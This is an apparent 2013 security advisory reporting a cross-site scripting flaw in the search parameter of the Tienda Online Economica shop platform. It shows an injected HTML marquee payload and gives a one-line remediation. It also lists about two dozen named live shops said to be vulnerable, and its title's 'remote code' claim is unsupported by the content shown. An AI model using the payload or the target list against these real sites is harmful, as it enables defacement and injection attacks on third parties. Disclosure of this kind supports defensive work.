Tienda-Online-Economica Cross Site Scripting

2013.08.12

Credit: Ivan Sanchez

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

+=============================================================================================+
+          Tienda-Online-Economica & XSS & Allow Execute Evil Remote Code                     +
+=============================================================================================+

Author(s):Ivan Sanchez 
Product: Tienda online economica
Url vendor: http://www.tienda-online-economica.com
Date: 11/08/2013
Vendor Notified: 10/08/2013


Extract:

En Tienda Online Econmica te ofrecemos todo lo necesario para que tengas tu tienda online lista para vender en internet en slo 3 semanas.
Y adems, con Tienda Online Econmica tendrs un dise?o nico y personalizado para tu tienda online, especial para vender tus productos,
y servicios en Internet. 


Explotation Parameter and Function:

http://DOMAIN/es/search/0

Parameter Affected:
q=  XSS

Function Affected:
<form id="frm-search" action="http://www.site.com/es/search/0" class="grid_2 alpha omega" method="post">
  <input id="q" name="q" type="text" value="<!-- HTML codes by Nullcode Team --> <marquee behavior="scroll" direction="left" scrollamount="10">Nullcode Team.</marquee> <marquee behavior="scroll" direction="left" scrollamount="40">Nullcode Team.</marquee> <marquee behavior="scroll" direction="left" scrollamount="50">Nullcode Team.</marquee> <marquee behavior="scroll" direction="left" scrollamount="60">Nullcode Team.</marquee> <marquee behavior="scroll" direction="left" scrollamount="70">Nullcode Team.</marquee>" />

  
  Remediation:
Sanitize all parameters


              www.evilcode.com.ar & www.nullcode.com.ar     Hunting Security Bugs  :-)
+=============================================================================================+
+            Tienda-Online-Economica & XSS & Allow Execute Evil Remote Code                   +
+=============================================================================================+



Example a lot of sites affected.-

http://www.bienvenuebebe.es
http://www.armariodelujo.com
http://www.ifil.es
http://www.conqueletrita.com
http://www.ideariaid.com
http://www.quierotec.com
http://www.leonidas-chocoworld.com
http://www.k9barcelonastore.com
http://www.tutallernatural.com
http://www.vegaknits.com
http://www.borgiaconti.com
http://www.tuherbalonline.com
http://www.rayasdiving.com
http://www.kisscomixstore.com
http://www.energyfruits.es
http://www.culturaverde.es
http://www.romavionline.com
http://www.sinkoletas.com
http://www.tiendadelmusculo.com
http://www.aceiteshermida.com
http://www.sycbolsos.com
http://www.demar.es
www.suplementosdeportivosonline.com
http://www.pallarsgourmet.com
http://www.tusexshoponline.net

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Tienda-Online-Economica Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.